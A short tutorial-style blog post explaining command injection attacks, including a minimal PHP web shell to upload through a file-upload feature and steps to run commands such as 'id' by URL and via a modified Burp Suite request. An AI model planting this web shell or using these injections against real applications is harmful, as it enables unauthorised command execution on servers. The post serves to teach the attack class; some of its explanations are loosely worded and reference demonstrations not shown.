What is Command Injection Attack?
It’s an attack in which the bad guys’ objective on this activity will be trying to obtain the execution of arbitrary commands on a vulnerable application. Normally, the vulnerability exposes when the application has sent unsafe user-supplied data to a system shell.
Normally, people will think that Code Injection and Command Injection but sadly it’s totally different where the Code Injection will allow the bad guys to usually add malicious code into the application and execute it remotely. However, the Command Injection will execute the command on the application with its functionality without they inject the code into the application itself.
How to the attack works?
Firstly, we can try to detect that the application that is vulnerable to the Command Injection would be looking at the URL Address. The possibility that the application is vulnerable would look something such as below:
http://example.com/index.php?pages=1If the application has an upload function, we can try to upload a file that contains the following code
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
Then, we can execute the command by typing the URL such as http://example.com/index.php?cmd=”any command”
Demonstration of the Injection attack
The demonstration is taken here
Another example that uses in the application
We also can use burpsuite to inspect the packet which you will have the output shown above.
We need to modify the payload by adding the { } symbol while the rest remain the same.
Let’s change the 0.0.0.0 with the “id” command which you will obtain the output that we not expecting at all.
No responses yet